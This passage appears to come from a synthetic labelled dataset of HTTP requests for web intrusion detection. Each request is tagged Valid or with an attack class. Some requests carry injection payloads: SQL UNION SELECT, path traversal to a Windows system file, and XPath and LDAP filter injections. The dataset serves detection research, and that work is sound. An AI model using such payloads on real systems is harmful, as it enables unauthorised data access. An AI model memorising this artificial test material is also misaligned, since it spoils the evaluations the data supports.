Client-ip: 217.16.182.224
Cookie: lhlu=4106300
Cookie2: $Version="5"
Date: Thu, 05 Apr 07 04:26:33 GMT
ETag: W/"f5.i_JBpb@ED-ha3dy"
Expect: lsoebqnj=eEeamdo;biEHtea=yneeSvNH
From: eOtxoh@nrxadyfhr.it
If-Modified-Since: Thu, 19 Jul 07 13:53:48 UTC
If-Unmodified-Since: Thu, 07 Jan 10 07:46:20 UTC
If-Match: "lWv0wz7@9QWomY4X0"
If-None-Match: "CsPlLT6uMbFrUeivp"
If-Range: *
Max-Forwards: 70
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Basic b3luMnJhbzpzY2hzZ3k=
Authorization: Digest username="eiepts"
Range: 408895-516542
Referer: /rlgm/iA4sant/scseir/rd5wlhoi.ace
TE: trailers
Trailer: Accept-Charset
User-Agent: es7hrx/0.4
UA-CPU: Sparc
UA-Disp: 230,315,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 297x5012
Via: airen6/0.6 www.woX1reN.htm, 5.7 10.172.165.207, dti/6.1 www.uhfg9a3.css
Transfer-Encoding: identity
Upgrade: rgaM/6.2, eac/6.8, aZco/9.9, tRa/2.6, hle/2.5
Warning: 480 196.122.77.17 "8mahoZAa56riutaIm" 
X-Forwarded-For: 49.121.77.5
X-Serial-Number: 575043034
----: ------------------------
~~~~~: ~~~~~~~~~~~

wKWsuurt6=eIu3Salloudi&ntit=Q&ffinornkoesilH=iIkhqCP&mF1ln=dkHarop3

End - Id: 7725
Start - Id: 49809
class: XPathInjection
GET /nale5iisf3e/A6/EYU-.-mUEp9btsw/hddonlreeki/cARmAcnvEobeT3vh/riSit4qtmEse.aspx?tD4tr0ztnPqreel=-eadmin5mr&oyaoo8M=geriaaiteuol&nlweoef5=622+++++or+++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D++%7C++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++or+++752%3D&ttEn=keniimgi HTTP/1.0
Host: 153.181.25.9
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: identity, gzip;q=0.3, identity;q=0.1, gzip
Accept-Language: Uti-ltnI3eby;q=0.5, nhNhdLI-snTEsu;q=0.9
Cache-Control: only-if-cached
Client-ip: 248.234.57.173
Cookie: asTebtf4fuhLpe=sabeitYIhyd;Gnulli_N@sam=makTact8Tnl
Cookie2: $Version="7"
Date: Wed, 11 Jul 07 22:23:00 GMT
ETag: "kdW8H_eGzQ8nREBeLA"
Expect: 100-continue
From: Eyi42tm7@6degzo.st
If-Modified-Since: Sat, 10 May 08 11:26:41 CET
If-Unmodified-Since: Wed, 14 Mar 07 21:11:01 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 27 Dec 09 11:28:03 GMT
Max-Forwards: 548
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: hbE9e eiza=ioIeete
Range: 220121-95165
Referer: http://www.smnnr.be/piet/ltmateot/7T6ema/rB6i0z/sieo.tar
TE: trailers,chunked;q=0.9,trailers
Trailer: Accept-Encoding
User-Agent: 2GTsTbw http://www.aMdffo.de
UA-CPU: MIPS
UA-Disp: 662,518,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 172x6984
Via: aeD/0.0 www.clysye.htm
Transfer-Encoding: gokl4m
Upgrade: oticr3/9.7
Warning: 205 www.ttrce.htm "Tia5umnten" 
X-Forwarded-For: 103.42.254.96
X-Serial-Number: 09611302404410791541
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49809
Start - Id: 35001
class: Valid
POST /dsiIccsThc2hahssSas/i-BhtAG2/tec0isg/OR5F/eBTLSExNwExnZBrn/lGci2K7e/hHnsDvz26ikeXpd0N/etcaZeehdnt/edhsona7ntubVahi/z6SoL/ltEturrtesgnteheho/ifhAo.php4? HTTP/1.0
Content-Length: 87
Content-Language: ebsiyr
Content-Encoding: compress
Content-Location: http://www.fEeh.be/rfbrfee/yj47/vehe.wmn
Content-MD5: SWp0RVZlaHJtNWRyaGVJZw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 16 Jun 09 21:29:51 CET
Last-Modified: Fri, 12 Mar 04 05:51:08 UTC
Host: www.cenqw.st
Connection: dsep
Accept: audio/*, text/*, application/postscript
Accept-Charset: *
Accept-Encoding: deflate, identity, gzip;q=0.9
Accept-Language: Beinrm-tet, apw-hc, osnent-wmt4s, e-nsRT;q=0.8, n-cifehIs8
Cache-Control: max-stale
Client-ip: 246.96.84.4
Cookie: tanmorwsexcjEn=5;ihcztel=8072;og=8066;6RzdivS-9P=7xhcr;mqnntafqbin=1cH1lbszU;if56tte=2614
Cookie2: $Version="235"
Date: Mon, 16 Jul 07 13:00:17 UTC
ETag: "qIjJFkr0VMW6YYooyzM"
Expect: aln3DpiH
If-Modified-Since: Fri, 12 Aug 05 02:20:09 UTC
If-Unmodified-Since: Fri, 01 Oct 04 08:44:55 CET
If-Match: "OBJqGhb3QL0dodP7sUZY"
If-None-Match: "jGHZev@roNQpc9e@47"
If-Range: Sun, 14 May 06 24:37:08 GMT
Max-Forwards: 299
Pragma: tms='eefaa2pc'
Authorization: Digest uri=/oeijnoom/gxarbi7n/knalnxl/euoese.mdb
Range: 98-
Referer: /Dcnf4cy/ilaToucI/t1o8dt/RSaot.js
TE: trailers,deflate;q=0.6,trailers
Trailer: If-Match
User-Agent: 0cottoin/3.5
UA-CPU: MIPS
UA-Disp: 611,6268,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 3778x0485
Via: TMmcpi/8.4 www.Tdss.png, 0.7 www.hsqlegur.html
Transfer-Encoding: gzip
Upgrade: 6eanj/6.8, HH2n/1.0, dmi/6.2, ixeo/8.4
Warning: 188 www.jlwap.css "euurnr8O" "Fri, 14 Jul 06 01:38:15 CET"
X-Forwarded-For: 151.22.66.165
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

0ssetaodrdr=5saaA&rOt=enph-islaR9srru ni8&lhewa=ignhoh0C>i ie-oprocessing-instruction

End - Id: 35001
Start - Id: 45763
class: PathTransversal
GET /lmihla/Cwinnthtpass-QQP@zXc5JL.png?up=6&oHseg8ho=r4QcGW&acceptQestdingjUJ=7gfT4s&aLvezNss1ejxu=ndhsee0aweh+56mub%3D&ln9ng=y5+%24minmt-lOecinputs&wsp=ntmph%3Dw&MUkTlh@UDreplace=..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&ytol=+m2ersUeacceptiioF&arrItk8arfi=access_logetulalnta%3E7%5Dx&UlihbEoos8iemu1=is8sENN&goeiehiwis=81067889&e1ds=eiebs&jsnObtmye0=aern&heor1jeoeO=4&9QS4ATgroup byKrWR=mdhtsaiae%3CzhphCgo HTTP/1.0
Host: 196.149.213.147:80
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: gzip, deflate, deflate;q=0.8, compress
Accept-Language: *;q=0.6
Cache-Control: max-stale=3
Client-ip: 94.195.108.172
Cookie: tar=169;4HmetaGrkf=7868;rrvlei=xKNL9xuJ48B;uiwejtboepA=cxuo9Vm6;Zexecwc=2622;8m=94674
Cookie2: $Version="51"
Date: Tue, 19 Jan 10 03:39:02 UTC
ETag: W/"ZuCaxTopQAS6sIGZ4"
Expect: 100-continue
From: EelBbSo@eeaysiht.net
If-Modified-Since: Wed, 11 Mar 09 15:21:02 GMT
If-Unmodified-Since: Sat, 31 Jan 04 21:21:20 UTC
If-Match: "phZOoCP_Yg8fQDTwm"
If-None-Match: *
If-Range: *
Max-Forwards: 0588
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: ehrxh feyrt=0igtd
Authorization: Bid3jw ermmy=OefhS
Range: -500252,934-3694
Referer: http://loaeeoc.ch/ln4Sh/pisAae.asmx
TE: trailers,trailers,trailers
Trailer: Pragma
User-Agent: eaulavhre/6.8.9
UA-CPU: MIPS
UA-Disp: 0244,7553,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 9810x7556
Via: 1.2 52.118.115.52
Transfer-Encoding: Luyi
Upgrade: tlly5t/1.5
Warning: 366 www.qjwrkE.jpg:272 "oMcna8llngods" 
X-Forwarded-For: 173.239.216.61
X-Serial-Number: 8409681186997
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 45763
Start - Id: 38732
class: LdapInjection
GET /emUtdisLemsni/eytnvrl/AriteTil5ensEi/mmaUjf0xzzuYi/t7rr/dud4.png?feh4iwesh=dstdino%5Diwsl+temshutdowncat&zudodikt5Z=+iet&flrshtnu=esxv&ndI1=14213515&io4sat=244533&ulQhVStB7cmdpv=34&hurltahe=63699&asn2oiDoT=ko8tsdqp&iOrRcTnl4=o+metarsamshnrmaad&hpjklys=execgroup+byT&ucreokneG=%29++++%28++%7C+%28tteer%3Denw*%29&a7eoqdetttovene=rairl+4ut0 HTTP/1.1
Host: 173.142.160.160:80
Connection: raesz
Accept: */*
Accept-Charset: iso-8859-8;q=0.2, x-mac-greek;q=0.5, gb2312;q=0.3, euc-tw
Accept-Encoding: deflate, identity, compress
Accept-Language: prfoal-Aoh, tiai-oaazst;q=0.1, foE-eehu2;q=0.6, Um-lhh
Cache-Control: no-store
Client-ip: 132.36.253.148
Cookie: no3FseoepnlesrX=rptum26do%ij0R u9~ei;qisunh=ai18ltnotin;aamtrn5enla=094;iudeqesjlne=78183;we3dhdoefa=y3ac3;9hgtmaawooneo6=277163214
Cookie2: $Version="09"
Date: Fri, 06 Mar 09 04:02:08 CET
ETag: "3@dn_UCGIlqI_Vtrv8"
Expect: 100-continue
From: siyWs@6ac5m.it
If-Modified-Since: Tue, 06 Nov 07 15:34:13 GMT
If-Unmodified-Since: Sun, 22 Feb 04 18:08:18 GMT
If-Match: "2Q.2CGmKCecOF8C4ko"
If-None-Match: "a8BfFov.wQgNTYi25UOM"
If-Range: Thu, 07 Aug 08 05:05:00 CET
Max-Forwards: 455
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: ztgn ZDrc=dnonaeea
Authorization: Digest username="76nlskE"
Range: -753,93960-,-52
Referer: /dita2/xbrae/o6tieee.pdf
TE: chunked;q=0.1
Trailer: Authorization
User-Agent: Mozilla/3.9 (X11; U; Solaris 5.3; uT-ee; rv:4.8.9) Gecko/25005964
UA-CPU: 68000
UA-Disp: 281,271,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 094x3377
Via: ofy/2.6 www.t4kim.htm, 6.3 24.79.174.72, HTTP/5.1 www.she0kte6.js
Transfer-Encoding: gzip
Upgrade: 5esn/7.7, ztlS/0.9, er6/2.0, rdryli/6.5, mla/1.5
Warning: 815 www.sni22ed.shtml "iihdw6iguibnuR" 
X-Forwarded-For: 18.156.103.46
X-Serial-Number: 320181381664910
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38732
Start - Id: 25923
class: Valid
GET /ahytclQittttsZ7ieHie.jpg?aQLTo8KG=tthn6tor9shdtsPcp0 HTTP/1.0
Host: 56.7.238.91:80
Connection: close
Accept: application/*;q=0.6
Accept-Charset: x-mac-arabic
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: min-fresh=33
Client-ip: 61.255.142.153
Cookie: xXLTv59fboot.inid=869522
Cookie2: $Version="2"
Date: Thu, 09 Nov 06 08:17:21 UTC
ETag: "NH1ie13fOBcwbVI2_"
Expect: Usri
From: pOyls@mejt.gov
If-Modified-Since: Mon, 16 Nov 09 06:32:29 UTC
If-Unmodified-Since: Sun, 04 Feb 07 03:44:27 UTC
If-Match: "xvTZHF6GFoP73SlnsqQx"
If-None-Match: *
If-Range: Tue, 14 Dec 04 03:35:00 UTC
Max-Forwards: 4
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: hnat riD8rdSl=brierdxs
Authorization: Digest nonce
Range: -1130,110984-785,-31
Referer: http://www.7uieb.de/Aaprdc/tEooeatL.dll
TE: deflate;q=0.9,trailers,trailers
Trailer: Host
User-Agent: Ogii/0.4.2.6
UA-CPU: PowerPC
UA-Disp: 5658,3017,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 5187x1770
Via: FTP/0.0 www.0sxthcay.css:9, Ore/9.6 254.247.159.175, FTP/0.1 www.menaa6e.jpg:0908
Transfer-Encoding: identity
Upgrade: L5mEt/8.6, onmhis/9.1, yacc0v/3.3
Warning: 600 www.rong.jpeg "ecdetwej" "Mon, 19 May 08 07:00:07 UTC"
X-Forwarded-For: 177.96.24.239
X-Serial-Number: 1807971586692
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 25923
Start - Id: 21019
class: Valid
GET /dteti7tThhAien/ieD/m6rcGokGtbSG9y1qg9CT/pQUId/nHl9/l8rrHt5chGsLn/wxp_Qrr.uorEcbcadminl/ewAyfR_-UmasRmhrzt/ATgEiitrn/dwau.tiff? HTTP/1.1
Host: www.bxla.it
Connection: sjer
Accept: */*
Accept-Charset: ks_c_5601-1987
Accept-Encoding: 
Accept-Language: 9hadi-xdeaoN, tdD-h8, vhee-NqAewf;q=0.3, bcbti-6yie;q=0.3, a-81oE
Cache-Control: only-if-cached
Client-ip: 207.254.64.132
Cookie: soarail=c;tnmochan%tY;LdegmeItnueose6=oYaa;nfer0=5473
Cookie2: $Version="6"
Date: Fri, 28 Oct 05 14:18:02 GMT
ETag: "yS7jeWo.CP_ngWA"
Expect: Lhiasd=bwo4owa
From: hrtiet@tsotaco.it
If-Modified-Since: Fri, 25 Apr 08 09:06:28 CET
If-Unmodified-Since: Thu, 16 Apr 09 06:51:41 GMT
If-Match: "rmCGloxXF9TrFRH5cb"
If-None-Match: *
If-Range: "3lpujoQYfRnaZ.teJ9k"
Max-Forwards: 07
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Basic b2h0cGVlbDpsbHFzZGlt
Authorization: mo2t3y ebokc4se=eboqs1ae
Range: 729-89313,-42549,64779-835298
Referer: /Uxg1/tear/dipn/d0rdh/kg7hq.cfm
TE: gzip,trailers
Trailer: Range
User-Agent: yeesexre6 (e8K3GaMw)
UA-CPU: 68000
UA-Disp: 1375,066,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 985x390
Via: HTTP/1.4 240.11.83.239:61, 1.9 www.hhrqmn.gif, 4.2 www.matH.html:52206
Transfer-Encoding: compress
Upgrade: bhme/4.1, ran/8.6
Warning: 346 www.pthbdHto.jpeg:13 "iretz" "Fri, 23 Jul 04 03:28:46 UTC"
X-Forwarded-For: 255.69.11.121
X-Serial-Number: 650978480578430420
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 21019
Start - Id: 9182
class: Valid
GET /u.CfN9FvaWEFiKkirGg/rd2Cs9lyXV/htuhrj82.css?lepSedtmsjfgo=718787&Equnion5=07029&ycmzcs7chjtdkE=3&a1=suhttpsrI&8NsedcLTnaI=38651&zM7i6vrUMqzS=ez4IVzkrAsBA&esdbe=2744&zeasglwu0ihn=+aaceiht%3Ad3rt9un&lhssqloqs=73111400&fnnbasl=e4c9ttautoexecj&nugsnnemeruiz=-nbel&hfyoaoumD4iqE=%40ev HTTP/1.1
Host: www.israiT.st:33094
Connection: close
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: deflate, identity;q=0.3, deflate
Accept-Language: *;q=0.1
Cache-Control: max-age=7980
Client-ip: 77.58.247.61
Cookie: _VUyZQopenXv@f=sr2ptrizie9a;nr8SUX8_img=76579;nlyfapayeejY=493;ao9onasduap= $bqh
Cookie2: $Version="66"
Date: Sun, 04 Jul 04 03:06:29 UTC
ETag: W/"GQzYez5kFT-UMY.Qx"
Expect: laeeo
From: egrds@churmi.org
If-Modified-Since: Sat, 31 Dec 05 20:21:03 CET
If-Unmodified-Since: Mon, 31 Dec 07 19:54:42 CET
If-Match: *
If-None-Match: "aDZu2d-sEMyhzcQRa"
If-Range: Tue, 23 Oct 07 17:12:22 GMT
Max-Forwards: 8925
MIME-Version: 8.7
Pragma: zarsirr=taNws
Proxy-Authorization: NTLM bmRlZ3JoZmEzbmlQZ29kSWJOb25ydDFvb1VubjZlOHJk
Authorization: Basic c2V0NzNlZWw6b2VlMDJlcQ==
Range: 57164-,9027-962000
Referer: http://www.hitshme9.it/thcs/trhi.jsp
TE: trailers
Trailer: Range
User-Agent: oa_-NkA http://www.Efhua.ch
UA-CPU: StrongARM
UA-Disp: 226,033,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 3033x117
Via: 1.2 110.190.18.232, 1.5 127.9.204.128:53, HTTP/0.0 239.221.206.206
Transfer-Encoding: compress
Upgrade: eew/0.7, rimtsu/2.3
Warning: 029 www.rgnrlhe.js "hetef0djrse" "Sun, 29 Aug 04 17:38:57 GMT"
X-Forwarded-For: 146.140.80.245
X-Serial-Number: 51512121332021601
----: ------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 9182
Start - Id: 11184
class: Valid
GET /hoeaoz/aluZmiV/tq/7XBTZr-ZXEH.tiff?hastl8snhmtoa=dbber&1wei=8644098&_JLMZnFk9bcopy=rs&ztkeiioreSceon=OgtZrigw&eam=+slbruwindow.openRcorh%3Dobn&idnneedomer6=deistirwze&SUe5tb5ht=+r%5B&i6lrmrny1uei=c8O0&lntSdstlcA7lhhq=ec&biey=1472404&smea=8549565&jvOcopy=ecalPlinksa%7Eoone&OIRk1oRM2=it%7EEg9&iNadkend=3174 HTTP/1.1
Host: 245.26.190.52
Connection: close
Accept: */*;q=0.7
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 31.125.40.176
Cookie: uyloJGheoe=tOdneenttt;ZJuallG7=el2Ri 9'la?iohn
Cookie2: $Version="2"
Date: Thu, 15 Jun 06 19:51:17 CET
ETag: "JqqkIqCF4xV4FZRK"
Expect: eczeesu=iUmhal;nbcu
From: exRkrsa@Adzgatioo.net
If-Modified-Since: Sun, 31 Jan 10 08:58:41 UTC
If-Unmodified-Since: Thu, 31 Dec 09 12:05:48 CET
If-Match: *
If-None-Match: *
If-Range: "jJl6steoyYoNxXrD0"
Max-Forwards: 8542
MIME-Version: 5.5
Pragma: Adekd=oobd
Proxy-Authorization: Basic Ym9pZWhhOjRueWU1enN0
Authorization: anoe4h Sone=lcsavTrj
Range: 13-23
Referer: http://www.9enqtddu.net/KniDa.shtml
TE: trailers,trailers
Trailer: Warning
User-Agent: ouFb3tast (ejlt4YnDg8; pwtmYcxmV4)
UA-CPU: StrongARM
UA-Disp: 473,1490,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0885x0139
Via: 6.7 161.82.46.229, 6.0 2.5.189.2, 4.0 www.dtrlha5a.tiff:05163
Transfer-Encoding: meha
Upgrade: aev/1.5, 3me/3.4, 5bni/1.4, int/8.3
Warning: 346 www.sfYor.jpg "sc7si" 
X-Forwarded-For: 177.214.243.176
X-Serial-Number: 450563801661696804
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11184
Start - Id: 41731
class: SqlInjection
GET /deoat62qiNm/dec4nzeSIi84atin/V0dp6QPu8TMv2SdV.php4?tgVimSem=98181729&ii=hMnbrn_ZpS&rn2=6543626960&ttaisN9lhd6o=raGQIZNQ&nyat=n%5Cu%7Cta%3BrvarEaccepts%2BUho&3sTmh=include&fb_Y=eus5cue&es8jtnttTgtiie=lRj&nLc-_I=3&ok89C=en4o%3EhCbt%7Ce&y@bHf1DMrxxI=%27++UNION+++++++++++ALL+++++++++SELECT+k1cl+++FROM+++++dtvhelsi++WHERE+%27%27+++%3D++%27 HTTP/1.0
Host: www.tesln2Ma.net:966
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate, gzip;q=0.9, gzip, identity;q=0.3
Accept-Language: *
Cache-Control: min-fresh=983
Client-ip: 130.12.152.206
Cookie: 4arw8R=91828
Cookie2: $Version="023"
Date: Thu, 10 Mar 05 07:35:30 CET
ETag: "x-y4MP-XTys@LWVZvO_A"
Expect: 100-continue
From: tn3rs6or@Itnftdpo.biz
If-Modified-Since: Thu, 10 Jul 08 20:51:12 UTC
If-Unmodified-Since: Sun, 06 Apr 08 18:50:58 GMT
If-Match: *
If-None-Match: "GXrGnNJe9dDO4fka"
If-Range: *
Max-Forwards: 073
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: Basic cmllaHR0YnQ6dHJlMg==
Authorization: atrPel w3heesC=beau
Range: 111-,-67748,-483206
Referer: http://Xhtosg.be/stes/jDjy/uhbylaeo/se3cte9h.msf
TE: gzip,trailers,deflate
Trailer: Upgrade
User-Agent: o4K3V0@Ur http://www.E8jhoje.ch
UA-CPU: Sparc
UA-Disp: 1862,8220,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 3172x1738
Via: HTTP/3.2 251.85.107.240, 6.7 47.169.235.190:0146
Transfer-Encoding: lrso; hnzirn=Erekhe
Upgrade: kmeyp7/6.4, oab/2.7, peZa/7.9, tihsau/8.6, rstvvt/0.5
Warning: 132 www.gls0.js "sseahcsnj2f1dtnEm93r" 
X-Forwarded-For: 208.165.185.87
X-Serial-Number: 775994
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41731
Start - Id: 8102
class: Valid
GET /f8sN2/avrptbtnSee6i/akj/K33phome1Wi_/PAx.tiff?9appzletaittit=90&aoau=m%404hsboot.inich+%2Fhavingeoa&llgoasaooV2l=483400&q1esIuip=se&axmsgsSdt=asshrcpRxp_ais+4yhn&9tllr4e=32561794 HTTP/1.0
Host: www.lsrit.fr
Connection: keep-alive
Accept: image/jpeg, video/mpeg
Accept-Charset: *;q=0.9
Accept-Encoding: compress, identity;q=0.3, gzip, gzip
Accept-Language: tI8-wt, teg-isSrxt6l, 7eV-eadaa;q=0.6, silb0u-4m0Omn;q=0.5
Cache-Control: no-transform
Client-ip: 72.69.12.253
Cookie: ta=av9RdGUy;xs9=tzqOFwX
Cookie2: $Version="9"
Date: Wed, 08 Jul 09 09:36:09 GMT
ETag: W/"EZQZ42wQZz8_bHX7yM"
Expect: rcti=i8busaat;ottreO=uetom
If-Modified-Since: Sat, 16 Jun 07 09:25:02 CET
If-Unmodified-Since: Fri, 26 Mar 04 04:24:23 UTC
If-Match: "Rh0ZNyhTOwVXROJ5lClC"
If-None-Match: *
If-Range: Thu, 08 Apr 10 15:45:21 CET
Max-Forwards: 9
MIME-Version: 2.4
Pragma: l8te=xhlnvrs
Proxy-Authorization: Basic ZWNkSWllOndzam1xZQ==
Authorization: Basic ZW9lYW46cmxzc3RudA==
Range: 96926-503180,-72
Referer: /m3naiap9.php4
TE: trailers
Trailer: User-Agent
User-Agent: nva6rcxtTo
UA-CPU: 68000
UA-Disp: 4009,1990,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 308x6685
Via: 5.3 www.ye5Sve1u.htm, 9.2 172.45.22.182
Transfer-Encoding: deflate
Upgrade: iSara/8.9, eey/2.3, eswsg/1.6, Eptj/3.0
Warning: 207 www.eaigb.htm "nqposom8cjoD7Vewo1b" 
X-Forwarded-For: 20.60.245.141
X-Serial-Number: 74656
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8102
Start - Id: 19025
class: Valid
GET /pph5gi/aLS17hS/eg5ig/r9es/vNaiae0et6hn4elo4g9d/oIOHZ0trEmN/iRA8swMfLbNgalGsi4/pMg/e1xggoaduitn.jpg?2oe=42649&CtbfHi=e3DsBKwN&nEnmLordT73ogn=8510885508&tib2=ae-q&ssetefsxenaoL=326371 HTTP/1.1
Host: www.e3eqbkma.ch:15230
Connection: sgpc8s
Accept: video/mpeg, audio/*
Accept-Charset: *
Accept-Encoding: deflate;q=0.3
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 142.107.31.11
Cookie: mles=boLftp?s teastdin t4t;HcFcnFstdinq=sh5l6ifhtpNrsR;wcSLs=htm;mwc=n.s0HKX1;2e0xeoanbwipn=f=tb
Cookie2: $Version="62"
Date: Tue, 08 Sep 09 15:20:23 UTC
ETag: W/"Kbn.rqTEpMB4ZJf"
Expect: fhtwerb
From: hseomd@2oso.ch
If-Modified-Since: Fri, 24 Sep 04 02:06:03 UTC
If-Unmodified-Since: Tue, 31 May 05 21:05:22 GMT
If-Match: *
If-None-Match: "CYx7a3T_N1jzuP92"
If-Range: Tue, 08 Jan 08 07:54:43 UTC
Max-Forwards: 42
MIME-Version: 8.1
Pragma: obegi=m0ndada
Proxy-Authorization: Digest response="d3EF6cFec42B33b63bdA11EE1B259cF4"
Authorization: Digest nonce
Range: 970214-
Referer: http://2anYw.org/brt4l/oaldeyna/mess/i8ebAi.php4
TE: gzip
Trailer: If-Match
User-Agent: Mozilla/9.8 (Machintosh; U; PPC 7.8; ti-rn; rv:8.2.6) Gecko/71685629
UA-CPU: MIPS
UA-Disp: 8898,8815,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 654x721
Via: FTP/3.4 93.198.158.229, 0.0 245.201.24.19, FTP/5.6 19.220.48.249
Transfer-Encoding: compress
Upgrade: Sa5x/4.1, eveeE/2.5
Warning: 116 170.222.10.170:68 "t5ueaspsrUFecey" "Tue, 17 Nov 09 03:08:22 GMT"
X-Forwarded-For: 144.31.247.88
X-Serial-Number: 27260320301
----: ---------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 19025
Start - Id: 37893
class: LdapInjection
GET /slisaaxttUUl/ss/r3L@bgsoundW4L3MorbRrf/nT53/dn4se64eelolt/uA9.swf?opoGiehsttMensa=os%27to&re5cHs=ss&7o9stIwqirh=75976900&lHatcmcntdt=nlavn8&hzT=0ieRaeki&rhhs=re%29%28%26%28objectClass++++%3D+++seI0*%29&esbfeekiBnoyR=eperl&05pRkevalJY7L=sVkJZsir9 HTTP/1.0
Host: 228.241.125.171:80
Connection: close
Accept: */*;q=0.3
Accept-Charset: iso-8859-8;q=0.3, hz-gb-2312, iso-8859-9;q=0.4, iso-8859-2
Accept-Encoding: compress, deflate;q=0.5
Accept-Language: 20roh-F5n;q=0.1
Cache-Control: iteelW='g0orp'
Client-ip: 64.67.93.181
Cookie: 5s=ipassthru;6BS_position@rBL-dropT=tw\r5nq;swO-V=l2Ssr;BmwhereRyGlE3ZP=283
Cookie2: $Version="1"
Date: Sat, 23 Feb 08 03:43:21 CET
ETag: W/"k_eK26HPsis_XTtOs"
Expect: 4UHf=yc9Ggg;iOlgaObr=Elden
From: pyeere9e@rgid7rnosp.be
If-Modified-Since: Wed, 25 Nov 09 17:06:42 UTC
If-Unmodified-Since: Sun, 17 Jun 07 08:40:59 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 10 Nov 09 24:54:11 GMT
Max-Forwards: 463
MIME-Version: 1.5
Pragma: 3='Hin'
Proxy-Authorization: Basic dWFlMDpEZHlhZW8=
Authorization: Basic ZWw5dDM6VXNzVXNh
Range: 33054-,52759-13523
Referer: /0csns.swf
TE: chunked;q=0.3,deflate,trailers
Trailer: User-Agent
User-Agent: Mozilla/3.4 (X11; U; Solaris 6.6; ai-hb; rv:7.2.9) Gecko/80096185
UA-CPU: Sparc
UA-Disp: 322,606,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 649x451
Via: 4.1 www.9len.shtml:058, 6.7 121.38.160.197
Transfer-Encoding: gzip
Upgrade: coid/6.4, u7a/5.9, ltuf/8.7, 7Shik/8.1, mtto/2.2
Warning: 960 www.tzoEs.tiff "dlespebn" "Wed, 09 Aug 06 04:59:18 CET"
X-Forwarded-For: 146.237.137.95
X-Serial-Number: 9686105266248523
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37893
Start - Id: 21479
class: Valid
GET /BmconnectperlWj/aPL4pxezSAOpI/niCn.Oe/e6/yEaCSGk90f8nr9R33jEq.php?weaanoG=cdjudby1KbNg&sns=uet1&7WdYdint=1284472&er=uY2KRLWOD&swkngceenc=gtrmtet%25processing-instructionr&l4=%29&lmhceuw=Egttpa+bt&Zibgps9=ebUALhLia HTTP/1.0
Host: www.ornrxnr.de
Connection: close
Accept: */*;q=0.7
Accept-Charset: windows-1251, x-mac-turkish;q=0.3
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 89.181.176.125
Cookie: M@Vrdyb=698;ohDdcgfRo=8;ayattpeau=r odw encbTey;ovctofDl=g.nVU
Cookie2: $Version="99"
Date: Sat, 23 Feb 08 24:10:59 UTC
ETag: W/"SP92jKSMi0F97Ui36wfH"
Expect: 100-continue
From: n6aee@n6bro.ch
If-Modified-Since: Wed, 06 Feb 08 05:03:12 GMT
If-Unmodified-Since: Wed, 19 Jan 05 15:44:06 UTC
If-Match: "8sTiFKSi8O@fNTHULw"
If-None-Match: "ROr38U72kwNasHw"
If-Range: "68XWo@kpNxDwSgaa"
Max-Forwards: 80
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: NTLM ZUFlc2hncG5tZjZvMHNkcnRkdHNkWGluMWVrZWlkdHlzc2VuYg==
Authorization: tewn ostiosAs=rau1bnt
Range: -90,-13698,843877-
Referer: http://www.oPye.net/santd/nrHiie6/ec5hl/eTma.mdb
TE: chunked
Trailer: Connection
User-Agent: Mozilla/5.1 (X11; U; Open BSD i386 1.5; pp-nt; rv:8.0.0) Gecko/00745788
